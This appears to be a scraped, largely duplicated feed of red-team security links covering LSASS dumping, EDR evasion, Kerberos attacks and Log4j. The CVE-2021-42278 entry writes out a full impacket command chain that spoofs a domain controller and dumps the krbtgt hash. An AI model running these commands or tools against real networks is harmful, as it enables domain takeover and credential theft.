Abusing Leaked Handles to Dump LSASS Memory
# https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html
# https://github.com/antonioCoco/MalSeclogon
#seclogon #lsass #dump #redteam
# https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html
# https://github.com/antonioCoco/MalSeclogon
#seclogon #lsass #dump #redteam
Extracting passwords from hiberfil.sys
When in password hunting mode and having access to the filesystem of the target, most people would reach out to SAM and/or extracting cached credentials. People often overlooked is hiberfil.sys and/or virtual machine snapshots or memory dumps, as they usually contain passwords in plain text.
https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps
#hiberfil #dump #password
When in password hunting mode and having access to the filesystem of the target, most people would reach out to SAM and/or extracting cached credentials. People often overlooked is hiberfil.sys and/or virtual machine snapshots or memory dumps, as they usually contain passwords in plain text.
https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps
#hiberfil #dump #password
EDRSandBlast
EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring.
https://github.com/wavestone-cdt/EDRSandblast
#lsass #dump #etw #redteam
EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring.
https://github.com/wavestone-cdt/EDRSandblast
#lsass #dump #etw #redteam
GitHub
GitHub - wavestone-cdt/EDRSandblast
Contribute to wavestone-cdt/EDRSandblast development by creating an account on GitHub.
Downgrading Kerberos Encryption & Why It Doesn’t Work In Server 2019
How we make Kerberos tickets use weaker encryption, the "TGT delegation trick", and why none of it works if the domain controllers are Windows Server 2019.
https://vbscrub.com/2021/12/04/downgrading-kerberos-encryption-amp-why-it-doesnt-work-in-server-2019/
#kerberos #windows2019 #pentest
How we make Kerberos tickets use weaker encryption, the "TGT delegation trick", and why none of it works if the domain controllers are Windows Server 2019.
https://vbscrub.com/2021/12/04/downgrading-kerberos-encryption-amp-why-it-doesnt-work-in-server-2019/
#kerberos #windows2019 #pentest
MAL-CL — Malicious Command-Line
MAL-CL aims to collect and document real world and most common "malicious" command-line executions of different tools and utilities while providing actionable detections and resources for the blue team.
https://github.com/3CORESec/MAL-CL
#windows #cli #detection #blueteam #redteam
MAL-CL aims to collect and document real world and most common "malicious" command-line executions of different tools and utilities while providing actionable detections and resources for the blue team.
https://github.com/3CORESec/MAL-CL
#windows #cli #detection #blueteam #redteam
Process Ghosting — EDR Evasion
The technique Process Herpaderping attempts to perform evasion by performing modification of the file (image tampering) which creates the process on a windows system. Deleting also the file during the creation of the process can have the same results. Even though some endpoint products have mature over the years and are able to detect complex threats organizations should constantly test the capabilities of their solution and should find alternate methods of detection even for the same technique.
https://pentestlaboratories.com/2021/12/08/process-ghosting/
#av #evasion #process #redteam #blueteam
The technique Process Herpaderping attempts to perform evasion by performing modification of the file (image tampering) which creates the process on a windows system. Deleting also the file during the creation of the process can have the same results. Even though some endpoint products have mature over the years and are able to detect complex threats organizations should constantly test the capabilities of their solution and should find alternate methods of detection even for the same technique.
https://pentestlaboratories.com/2021/12/08/process-ghosting/
#av #evasion #process #redteam #blueteam
Pentest Laboratories
Process Ghosting
Understanding how endpoint products work to identify malicious actions can lead to the discovery of security gaps which can be used for evasion during red team operations. The technique Process Her…
ipsourcebypass
This Python script can be used to bypass IP source restrictions using HTTP headers.
https://github.com/p0dalirius/ipsourcebypass
#ip #header #bypass #bugbounty
This Python script can be used to bypass IP source restrictions using HTTP headers.
https://github.com/p0dalirius/ipsourcebypass
#ip #header #bypass #bugbounty
Example Reports
If you're looking for examples of pentest reports, globalcptc has released redacted versions of the teams that made it to finals for the last 2 years (25 reports)
https://github.com/nationalcptc/report_examples
If you're looking for examples of pentest reports, globalcptc has released redacted versions of the teams that made it to finals for the last 2 years (25 reports)
https://github.com/nationalcptc/report_examples
GitHub
GitHub - globalcptc/report_examples: Example reports from prior years of the Collegiate Penetration Testing Competition
Example reports from prior years of the Collegiate Penetration Testing Competition - globalcptc/report_examples
Log4j RCE — CVE-2021-44228
The vulnerability allows for unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services.
# https://www.lunasec.io/docs/blog/log4j-zero-day/
# https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
# https://github.com/whwlsfb/Log4j2Scan
# https://github.com/Cybereason/Logout4Shell
#apache #log4j #cve #rce
The vulnerability allows for unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services.
# https://www.lunasec.io/docs/blog/log4j-zero-day/
# https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
# https://github.com/whwlsfb/Log4j2Scan
# https://github.com/Cybereason/Logout4Shell
#apache #log4j #cve #rce
ldapconsole
It's a script allowing to perfom custom LDAP queries to a Windows domain and select specific attributes.
Features
— Authenticate with password
— Authenticate with LM:NT hashes
— Authenticate with kerberos ticket
https://github.com/p0dalirius/ldapconsole
#ldap #query #tools
It's a script allowing to perfom custom LDAP queries to a Windows domain and select specific attributes.
Features
— Authenticate with password
— Authenticate with LM:NT hashes
— Authenticate with kerberos ticket
https://github.com/p0dalirius/ldapconsole
#ldap #query #tools
GitHub
GitHub - p0dalirius/ldapconsole: The ldapconsole script allows you to perform custom LDAP requests to a Windows domain.
The ldapconsole script allows you to perform custom LDAP requests to a Windows domain. - p0dalirius/ldapconsole
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278)
Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with an "$" at the end of the name
This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller.
Example:
0. Create a сomputer account
# https://exploit.ph/more-samaccountname-impersonation.html
# https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
# https://www.geekby.site/2021/12/samaccountname-spoofing/
# https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383
#ad #pac #s4u2self #windows #redteam
Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with an "$" at the end of the name
This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller.
Example:
0. Create a сomputer account
addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'
1. Clear its SPNsaddspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController
2. Rename the computer (computer -> DC)renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'
3. Obtain a TGTgetTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'
4. Reset the computer namerenameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'
5. Bbtain a service ticket with S4U2self by presenting the previous TGTKRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'
6. DCSync by presenting the service ticketKRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'
# https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html# https://exploit.ph/more-samaccountname-impersonation.html
# https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing
# https://www.geekby.site/2021/12/samaccountname-spoofing/
# https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383
#ad #pac #s4u2self #windows #redteam
APT
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278) Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time…
Automated Exploitation of the CVE-2021-42287/CVE-2021-42278 (Windows)
Binary:
https://github.com/cube0x0/noPac
PowerShell:
https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6
#ad #pac #s4u2self #windows #redteam
Binary:
https://github.com/cube0x0/noPac
PowerShell:
https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6
#ad #pac #s4u2self #windows #redteam
ADenum
ADEnum is a pentesting tool that allows to find misconfiguration through the protocol LDAP and exploit some of those weaknesses with Kerberos.
https://github.com/SecuProject/ADenum
#ad #ldap #kerberos #enumeration #tools
ADEnum is a pentesting tool that allows to find misconfiguration through the protocol LDAP and exploit some of those weaknesses with Kerberos.
https://github.com/SecuProject/ADenum
#ad #ldap #kerberos #enumeration #tools
GitLab CI jobs unmasked passwords scanner
https://github.com/Whitespots-OU/gitlab-ci-secrets
#tools #secrets #devsecops
https://github.com/Whitespots-OU/gitlab-ci-secrets
#tools #secrets #devsecops
GitHub
GitHub - Whitespots-OU/gitlab-ci-secrets: Gitlab CI jobs stdout secrets finder
Gitlab CI jobs stdout secrets finder. Contribute to Whitespots-OU/gitlab-ci-secrets development by creating an account on GitHub.